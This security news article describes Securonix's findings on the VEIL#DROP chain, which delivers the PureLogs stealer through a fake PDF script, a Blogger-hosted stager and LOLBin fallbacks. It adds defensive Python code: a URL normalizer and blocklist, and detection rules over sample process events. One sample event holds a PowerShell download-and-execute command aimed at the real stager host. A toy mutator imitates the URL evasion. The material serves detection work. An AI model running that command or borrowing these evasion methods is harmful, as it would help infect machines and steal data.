Cybersecurity researchers have flagged a new multi-stage malware delivery attack chain that uses social engineering and Blogger pages to deliver an information stealer called PureLogs.
The activity has been codenamed VEIL#DROP by Securonix. The initial payloads are suspected to be distributed either via spear-phishing or a drive-by compromise, in which an unsuspecting user lands on a website (either attacker-created or legitimate but compromised) under the attacker's control.
“The infection chain begins with a deceptively named JavaScript file masquerading as a document (e.g., transcript.pdf.js), which executes through Windows Script Host and launches PowerShell with execution policy bypasses enabled,” researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee said in a report shared with The Hacker News.
At a high level, the PowerShell script is responsible for retrieving a next-stage payload hosted on Blogger (“htlwub00klocate.blogspot[.]com”), allowing the attackers to bypass reputation-based defenses by abusing Google’s trusted infrastructure as a stager and to blend in with legitimate web activity.
The downloaded PowerShell payload opens a benign web page (Google, for example) as a decoy, creating the impression that a PDF document has been opened, while the infection sequence proceeds silently in the background and ultimately deploys PureLogs Stealer, a .NET-based information stealer known for harvesting a wide array of sensitive data from compromised hosts.
The PowerShell loader also attempts to relax the execution policy so that follow-up PowerShell commands run unrestricted, terminate selected processes such as "wscript.exe" to reduce the forensic trail, delete "transcript.pdf.js" to remove evidence of execution, and decrypt an embedded payload.
“Following successful XOR decryption, the loader transitions into one of the most evasive components of the VEIL#DROP framework: dynamic stage generation combined with runtime mutation,” Securonix explained. “Rather than using static indicators such as hard-coded URLs or predictable execution patterns, the malware constructs the next-stage payload location dynamically during execution.”
This involves building a unique blogspot[.]com URL for each execution by inserting a random number of forward slashes into the URL string, so that the exact string differs from run to run and defeats static URL signatures, indicator-based blocking, and URL-based filtering that compare the literal string. The host itself does not change, so the padding only evades controls that match on the full URL rather than on the domain.
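The slash padding only works against indicators that compare the raw URL string, so the practical countermeasure is to normalize before matching. The Python below is an added example (not code from the Securonix report); it assumes the extra slashes can appear anywhere after the scheme, since the report does not state the exact position, and it includes a toy `mutate_url` that imitates the per-execution padding so the normalizer can be checked against many variants. The blocklist contains the report's stager host with the "[.]" defanging undone.

```python
import random
import re
from urllib.parse import urlsplit

# Constructed blocklist: the stager host named in the report, defanging removed.
BLOCKED_HOSTS = {"htlwub00klocate.blogspot.com"}


def normalize_url(url: str) -> str:
    """Collapse runs of '/' so slash-padded variants compare equal.

    A client that tolerates 'https:////host///path' fetches the same resource as
    'https://host/path'; a string-equality indicator does not see them as equal.
    Assumed padding model: extra '/' characters anywhere after the scheme.
    """
    m = re.fullmatch(r"([A-Za-z][A-Za-z0-9+.-]*):/+(.*)", url, re.S)
    if not m:
        return url
    scheme, rest = m.group(1).lower(), m.group(2)
    return f"{scheme}://{re.sub(r'/{2,}', '/', rest)}"


def host_of(url: str) -> str:
    """Hostname of the normalized URL, lower-cased ('' if unparseable)."""
    return (urlsplit(normalize_url(url)).hostname or "").lower()


def is_blocked(url: str) -> bool:
    """Host-based match that survives the slash padding."""
    return host_of(url) in BLOCKED_HOSTS


def mutate_url(url: str, rng: random.Random) -> str:
    """Toy model of the per-execution mutation (constructed for this example,
    not the loader's own logic): pad the scheme separator and one path slash
    with a random number of extra '/' characters."""
    scheme, rest = url.split("://", 1)
    segments = rest.split("/")
    if len(segments) > 1:
        i = rng.randrange(1, len(segments))
        segments[i] = "/" * rng.randint(0, 5) + segments[i]
    return f"{scheme}:{'/' * (2 + rng.randint(1, 6))}{'/'.join(segments)}"


def variants(url: str, n: int, seed: int = 1) -> list:
    """n deterministic padded variants of url."""
    rng = random.Random(seed)
    return [mutate_url(url, rng) for _ in range(n)]


def all_match_after_normalization(url: str, n: int = 20, seed: int = 1) -> bool:
    """True when every padded variant normalizes back to url and gets the
    same blocklist verdict as url."""
    return all(normalize_url(v) == url and is_blocked(v) == is_blocked(url)
               for v in variants(url, n, seed))


if __name__ == "__main__":
    canonical = "https://htlwub00klocate.blogspot.com/p/x.html"
    for v in variants(canonical, 5):
        print(f"{v!r:<64} blocked={is_blocked(v)}")
    print("all variants match:", all_match_after_normalization(canonical))
```

Normalizing the scheme separator is the part most URL filters skip; collapsing only the path would still let `https:////host/` slip past a full-string indicator.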
In addition, the decoded script introduces runtime mutation and polymorphism by replacing placeholder values within the script with randomly generated strings and values during execution. This variability is designed to defeat script signatures and file hashes, thereby preventing reliable detection.
The reconstructed script is then executed entirely in memory, leaving no artifacts on disk. It functions as a loader that decodes and runs the core malware component, a .NET assembly launched using a technique known as reflective code loading.
In the event security controls or other environmental restrictions prevent it from executing the recovered .NET assemblies directly from memory, the loader falls back to an execution method that relies on Microsoft-signed binaries, such as "regsvcs.exe," "installutil.exe," "msbuild.exe," and "aspnet_compiler.exe," to accomplish the same goal without drawing attention.
Because these binaries are trusted, signed by Microsoft, and are already present on the system, the living-off-the-land (LotL) approach enables the attackers to make their activity appear legitimate and fly under the radar.
“One of the most notable aspects of the loader is that it does not depend on any single LOLBin,” the researchers pointed out. “Instead, execution follows a cascading model, attempting each method until one succeeds.”
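Both the initial chain (a `.pdf.js` file run by Windows Script Host, which then spawns PowerShell with the execution policy bypassed) and the LOLBin cascade quoted above surface in ordinary process-creation telemetry. The Python below is an added editor's example, not code from the Securonix report: it runs three rules over constructed Sysmon Event ID 1 style events. It generalizes the report's single filename to common document/script double extensions and to the abbreviated `-ep`/`-exec` spellings PowerShell accepts, and it uses the parent process as the discriminator so that an administrator's own `-ExecutionPolicy Bypass` launched from Explorer is not flagged. Field names follow Sysmon; the event contents are invented.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon Event ID 1 style fields), not logs
# from the report. Events 0-2 model the chain; events 3-4 are benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\transcript.pdf.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -Command '
                    '"iex (New-Object Net.WebClient).DownloadString(\'https://htlwub00klocate.blogspot.com/\')"'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'regsvcs.exe C:\Users\u\AppData\Local\Temp\stage.dll'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Tools\backup.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# The fallback LOLBins named in the report.
LOLBIN_FALLBACKS = {"regsvcs.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}

# Document-looking name followed by a WSH-executable extension (transcript.pdf.js and kin).
MULTI_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|txt|rtf)\.(?:js|jse|vbs|vbe|wsf|wsh|hta)\b", re.I)
# PowerShell accepts unambiguous parameter prefixes, so match the short forms too.
EP_BYPASS = re.compile(r"-(?:executionpolicy|exec|ex|ep)\s+bypass", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return the names of the rules that fire for one process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    # Rule 1: script host running a file with a document-then-script double extension.
    if image in SCRIPT_HOSTS and MULTI_EXT.search(cmd):
        hits.append("script_host_multi_extension")
    # Rule 2: PowerShell with the execution policy bypassed, spawned by a script host.
    if image in POWERSHELL and parent in SCRIPT_HOSTS and EP_BYPASS.search(cmd):
        hits.append("powershell_bypass_from_script_host")
    # Rule 3: one of the fallback LOLBins launched by PowerShell.
    if image in LOLBIN_FALLBACKS and parent in POWERSHELL:
        hits.append("lolbin_fallback_from_powershell")
    return hits


def scan(events: list) -> dict:
    """Map event index -> fired rules, for events that fired at least one rule."""
    results = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}  <- {SAMPLE_EVENTS[idx]['CommandLine'][:60]}")
```

Rule 3 is deliberately broad because the cascade tries each binary until one works; the parent-process condition, not the binary name, is what separates it from legitimate .NET tooling.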
The impact of a stealer infection typically goes beyond the initially compromised endpoint, as the harvested data can act as a stepping stone to burrow deeper into the target environment, establish persistence, perform lateral movement, and even breach its cloud infrastructure.
“The combination of compromised websites, multi-extension masquerading, trusted cloud services, XOR-obfuscated payloads, reflective .NET loading, fileless execution, and LOLBIN abuse demonstrates a deliberate effort to evade traditional antivirus solutions, reduce forensic artifacts, and maintain operational stealth throughout the infection lifecycle,” Securonix said.